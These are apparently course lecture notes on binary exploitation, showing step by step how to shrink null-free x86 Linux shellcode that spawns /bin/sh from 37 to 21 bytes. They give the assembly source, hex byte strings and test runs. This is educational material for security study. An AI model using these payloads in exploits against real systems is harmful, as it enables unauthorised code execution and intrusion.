Lec. 12: Short Shell Code

1. Reducing the Size of Shell Code

1 Reducing the Size of Shell Code

Shell code has three main properties: (1) it executes a system call to open a shell or do some other action; (2) it does not contain null bytes; and (3), it is small. So far, the shell code we've developed is 37 bytes. Let's review that piece of shell code now:

SECTION .text                   ; Code section
                global _start   ; Make label available to linker

_start:                         ; Standard ld entry point

         jmp callback           ; Jump to the end to get our current address

dowork:
         pop esi                ; esi now holds the address of "/bin/sh"

         xor edx,edx            ; edx = 0 (it's also param #3 - NULL)
         push edx               ; args[1] - NULL
         push esi               ; args[0] - "/bin/sh"

         mov ecx,esp            ; Param #2 - address of args array
         mov ebx,esi            ; Param #1 - "/bin/sh"
         xor eax,eax            ; eax = 0
         mov al,0xb             ; System call number for execve
         int 0x80               ; Interrupt 80 hex - invoke system call

         xor ebx,ebx            ; Exit code, 0 = normal
         xor eax,eax            ; eax = 0
         inc eax                ; System call number for exit (1)
         int 0x80               ; Interrupt 80 hex - invoke system call

callback:
         call dowork            ; Pushes the address of "/bin/sh" onto the stack
         db "/bin/sh",0         ; The program we want to run - "/bin/sh"

To see it's current size, let's compile and use the hexify program to count the number of bytes:

user@si485H-base:demo$ nasm -g -f elf -o long_shell.o long_shell.asm
user@si485H-base:demo$ ld  -o long_shell long_shell.o
user@si485H-base:demo$ ./hexify.sh long_shell
\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00
user@si485H-base:demo$ printf `./hexify.sh long_shell` | wc -c
37

That may seem ok: 37 bytes is pretty short. We can do better, though, because the shorter the shell code the more easily we can drop it as a payload.

1.1 Using the Stack More Effectively

Our first target for reducing the size the shell code is to remove the jmp-call back procedures. Let's look at the objdump of the code to see how many bytes are used:

08048060 <_start>:
 8048060: eb 16                 jmp    8048078 <callback>

08048062 <dowork>:
 8048062: 5e                    pop    esi
 8048063: 31 d2                 xor    edx,edx
 8048065: 52                    push   edx
 8048066: 56                    push   esi
 8048067: 89 e1                 mov    ecx,esp
 8048069: 89 f3                 mov    ebx,esi
 804806b: 31 c0                 xor    eax,eax
 804806d: b0 0b                 mov    al,0xb
 804806f: cd 80                 int    0x80
 8048071: 31 db                 xor    ebx,ebx
 8048073: 31 c0                 xor    eax,eax
 8048075: 40                    inc    eax
 8048076: cd 80                 int    0x80

08048078 <callback>:
 8048078: e8 e5 ff ff ff        call   8048062 <dowork>
 804807d: 2f                    das    
 804807e: 62 69 6e              bound  ebp,QWORD PTR [ecx+0x6e]
 8048081: 2f                    das    
 8048082: 73 68                 jae    80480ec <callback+0x74>

If you look closely at the call instruction, you see that this takes 5 whole bytes! That's simply too many. Let's look for a way to reduce this.

1.1.1 Attempt 1

Let's try the strategy where we push all the bytes of the "/bin/sh" onto the stack, one-by-one, and then the stack pointer will be the address of the start of the string. Something like this:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
         xor eax,eax

         push eax               ;\0
         push 0x68              ;h
         push 0x73              ;s
         push 0x2f              ;/
         push 0x6e              ;n
         push 0x69              ;i
         push 0x62              ;b
         push 0x2f              ;/

         mov esi,esp            ; esp is address of "/bin/sh"

         xor edx,edx            ; edx = 0 (it's also param #3 - NULL)
         push edx               ; args[1] - NULL
         push esi               ; args[0] - "/bin/sh"


         mov ecx,esp            ; Param #2 - address of args array
         mov ebx,esi            ; Param #1 - "/bin/sh" is *esp
         mov al,0xb             ; System call number for execve
         int 0x80               ; Interrupt 80 hex - invoke system call

         xor ebx,ebx            ; Exit code, 0 = normal
         xor eax,eax            ; eax = 0
         inc eax                ; System call number for exit (1)
         int 0x80               ; Interrupt 80 hex - invoke system call

Looking at this, we get the same effect of the jmp-call back to get a position free reference to the string "/bin/sh". Let;s take a look at the objdump to see how this changed things:

Disassembly of section .text:

08048060 <_start>:
 8048060:	31 c0                	xor    eax,eax
 8048062:	50                   	push   eax
 8048063:	6a 68                	push   0x68
 8048065:	6a 73                	push   0x73
 8048067:	6a 2f                	push   0x2f
 8048069:	6a 6e                	push   0x6e
 804806b:	6a 69                	push   0x69
 804806d:	6a 62                	push   0x62
 804806f:	6a 2f                	push   0x2f
 8048071:	89 e6                	mov    esi,esp
 8048073:	31 d2                	xor    edx,edx
 8048075:	52                   	push   edx
 8048076:	56                   	push   esi
 8048077:	89 e1                	mov    ecx,esp
 8048079:	89 f3                	mov    ebx,esi
 804807b:	b0 0b                	mov    al,0xb
 804807d:	cd 80                	int    0x80
 804807f:	31 db                	xor    ebx,ebx
 8048081:	31 c0                	xor    eax,eax
 8048083:	40                   	inc    eax
 8048084:	cd 80                	int    0x80

Looking closely, there are two bytes for every push, and we push 7 items, for 14 bytes. Referring back to the jmp-callback version of the code. There were 12 bytes for the call back and 2 bytes for the jmp, that's 14 byts. We gained nothing!

Worse, let's see if this shell code actually works:

user@si485H-base:demo$ ./push_shell_1 
user@si485H-base:demo$

Fail.

To figure out why this shell code doesn't work, we'll have to trace its execution in gdb.

user@si485H-base:demo$ gdb -q push_shell_1 
Reading symbols from push_shell_1...done.
(gdb) b _start
Breakpoint 1 at 0x8048060
(gdb) r
Starting program: /home/user/git/si485-binary-exploits/lec/12/demo/push_shell_1 

Breakpoint 1, 0x08048060 in _start ()
(gdb) ds
Dump of assembler code for function _start:
=> 0x08048060 <+0>:	xor    eax,eax
   0x08048062 <+2>:	push   eax
   0x08048063 <+3>:	push   0x68
   0x08048065 <+5>:	push   0x73
   0x08048067 <+7>:	push   0x2f
   0x08048069 <+9>:	push   0x6e
   0x0804806b <+11>:	push   0x69
   0x0804806d <+13>:	push   0x62
   0x0804806f <+15>:	push   0x2f
   0x08048071 <+17>:	mov    esi,esp
   0x08048073 <+19>:	xor    edx,edx
   0x08048075 <+21>:	push   edx
   0x08048076 <+22>:	push   esi
   0x08048077 <+23>:	mov    ecx,esp
   0x08048079 <+25>:	mov    ebx,esi
   0x0804807b <+27>:	mov    al,0xb
   0x0804807d <+29>:	int    0x80
   0x0804807f <+31>:	xor    ebx,ebx
   0x08048081 <+33>:	xor    eax,eax
   0x08048083 <+35>:	inc    eax
   0x08048084 <+36>:	int    0x80
End of assembler dump.
(gdb) x/3x $esp
0xbffff720:	0x00000001	0xbffff847	0x00000000

Looking at the stack at this point, things seem to be going okay. Let's take three steps:

(gdb) ni 3
0x08048065 in _start ()
(gdb) ds
Dump of assembler code for function _start:
   0x08048060 <+0>:	xor    eax,eax
   0x08048062 <+2>:	push   eax
   0x08048063 <+3>:	push   0x68
=> 0x08048065 <+5>:	push   0x73
   0x08048067 <+7>:	push   0x2f
   0x08048069 <+9>:	push   0x6e
   0x0804806b <+11>:	push   0x69
   0x0804806d <+13>:	push   0x62
   0x0804806f <+15>:	push   0x2f
   0x08048071 <+17>:	mov    esi,esp
   0x08048073 <+19>:	xor    edx,edx
   0x08048075 <+21>:	push   edx
   0x08048076 <+22>:	push   esi
   0x08048077 <+23>:	mov    ecx,esp
   0x08048079 <+25>:	mov    ebx,esi
   0x0804807b <+27>:	mov    al,0xb
   0x0804807d <+29>:	int    0x80
   0x0804807f <+31>:	xor    ebx,ebx
   0x08048081 <+33>:	xor    eax,eax
   0x08048083 <+35>:	inc    eax
   0x08048084 <+36>:	int    0x80
End of assembler dump.
(gdb) x/3x $esp
0xbffff718:	0x00000068	0x00000000	0x00000001

Ok. Now we have sense of what is going on. Looking closely, you can see that when we pushed 0x68, we didn't push just the byte of 0x68, we push the 4-byte value of 0x00000068. Why?

The stack is always 4-byte aligned. This is to ensure that when you push and pop, you get consistent answers. The thing that you push onto the stack is always popped off the stack. There is no way to push single bytes. It doesn't allow you to get out of alignment, so you must ALWAYS push 4-byte values. But, we can work with that.

1.1.2 Attempt 2

Now that we are a bit more familiar with the stack, we can change our shell code to push the entire byte sequence for "/bin/sh" in two steps.

Problem: "/bin/sh" is 7 bytes long, and we can only push 4 byte sequences! This can be solved with leveraging the file system path constructs. For example, "//bin/sh" is the same as "/bin//sh" which is the same as "/bin/sh".

With that, we have the following shell code:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        xor eax,eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 

        mov esi,esp             ;esp is argv

        xor edx,edx             ; edx = 0 (it's also param #3 - NULL)
        push edx                ; args[1] - NULL
        push esi                ; args[0] - "/bin/sh"


        mov ecx,esp             ; Param #2 - address of args array
        mov ebx,esi             ; Param #1 - "/bin/sh" is *esp
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

        xor ebx,ebx             ; Exit code, 0 = normal
        xor eax,eax             ; eax = 0
        inc eax                 ; System call number for exit (1)
        int 0x80                ; Interrupt 80 hex - invoke system call

Looking closely at the two push commands, we have to be mindful of the order and little-endian.

push 0x68732f6e         ;n/sh
push 0x69622f2f         ;//bi

Note first that the last thing pushed on the stack would be the start of the string sequence. The byte 0x2f is '/', and looking closely at the bytes, you see that the number 0x69622f2f is "ib//" which when reversed in little endian storage, becomes "//bi."

Finally, we still have to NULL terminate the string, so we push onto the stack first zero byte. When it is all said and done, we get the following:

      | 0x0 0x0 0x0 0x0 | 0x00000000
      | 'n' '/' 's' 's' | 0x68732f6e
esp-> | '/' '/' 'b' 'i' | 0x69622f2f
      '-----------------'

And, we can now use the value of esp as the start of the "/bin/sh\0" string.

Let's compile and see if this works:

user@si485H-base:demo$ ld  -o push_shell_2 push_shell_2.o
user@si485H-base:demo$ ./push_shell_2 
$ echo "It worked!"
It worked!
$

And, we can see how many bytes it is:

user@si485H-base:demo$ printf `./hexify.sh push_shell_2` | wc -c
34

Woohoo! We saved 3 bytes.

1.2 Removing Crud from the Shell Code

The next place to turn our frugal eyes upon is the extra bit of crud in the shell code. In particular, let's start by removing the exit system call. Why do we need to exit cleanly from our shell code if we fail to execve? Who cares? We are trying to bring down the systems and a bit of segfaulting here and there is ok by me.

The second item we want to focus on is the execve() call itself. It turns out that you don't need to do quite as much work for the shell to execute. Consider this small example program:

user@si485H-base:demo$ cat small_execve.c 
#include <unistd.h>

int main(){
  execve("/bin/sh",NULL,NULL);
}

Notice, in this is execve call there is no argv array. We just leave this NULL, which is not preferred but still works. Essentially, you are indicating that you do not want any arguments at all, but execve is smart enough to fix this for you later. In fact, running this program works fine:

user@si485H-base:demo$ gcc small_execve.c   -o small_execve
small_execve.c: In function ‘main’:
small_execve.c:4:3: warning: null argument where non-null required (argument 2) [-Wnonnull]
   execve("/bin/sh",NULL,NULL);
   ^
user@si485H-base:demo$ ./small_execve 
$ echo "It Works!"           
It Works!
$

Yes, the compiler complains, but who cares if it works.

With these changes, we are left with the following shell code:

SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        xor eax,eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 

        xor edx,edx            ; Parm #3 - NULL
        xor ecx,ecx            ; Param #2 - NULL
        mov ebx,esp             ; Param #1 - "/bin/sh" is *esp
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

And we can compile and test:

user@si485H-base:demo$ nasm -f elf smaller_shell.asm -o smaller_shell.o
user@si485H-base:demo$ ld smaller_shell.o -o smaller_shell
user@si485H-base:demo$ ./smaller_shell 
$ echo "It Works!"    
It Works!
$ 
user@si485H-base:demo$ printf `./hexify.sh smaller_shell` | wc -c
23

Now we are at 23 bytes! Wow, but believe it or not, we can still do 2 bytes better.

1.3 Zeroing Out Better

The last place to gain an advantage, and it is a small one is in the process of zeroing bytes. There are a number of instructions that are designed to deal with 8-byte arithmetic by using multiple registers to store the results of values that overflow 4-byte numbers. The instruction we will concern ourselves with is the mul instruction.

The mul instruction has the following form:

mul reg

It will:

Multiple the value in reg with the value currently in eax
The result will be stored with the lower 4-bytes in eax and the upper 4-bytes in edx

What does this imply? Well, if we multiple where the value in the registers is zero, then eax will be zero AND edx will be zero. The mul instruction is just two bytes, and using that two bytes, we can do two zero'ing, saving us two bytes overall.

Here's the resulting shell code:

user@si485H-base:demo$ cat smallest_shell.asm 
SECTION .text                   ; Code section
                 global _start  ; Make label available to linker
_start:
        xor ecx,ecx
        mul ecx                 ;0's edx and and eax
        push eax                ;\0
        push 0x68732f6e         ;n/sh
        push 0x69622f2f         ;//bi 


        mov ebx,esp             ; Param #1 - "/bin/sh" is *esp
        mov al,0xb              ; System call number for execve
        int 0x80                ; Interrupt 80 hex - invoke system call

If you look at the two instructions at the top:

xor ecx,ecx
mul ecx

First, by zeroing out ecx, and then doing mul ecx, we multiple the value in eax by zero and store zero in both eax and edx.

We can show that this shell code does work and see how many bytes it is:

user@si485H-base:demo$ nasm -f elf smallest_shell.asm -o smallest_shell.o
user@si485H-base:demo$ ld smallest_shell.o -o smallest_shell
user@si485H-base:demo$ ./smallest_shell 
$ echo "It Works!"
It Works!
$ 
user@si485H-base:demo$ printf `./hexify.sh smallest_shell` | wc -c
21

We are now at 21 bytes! And, that's about as small as it can get. I haven't seen any examples much smaller than this that work consistently.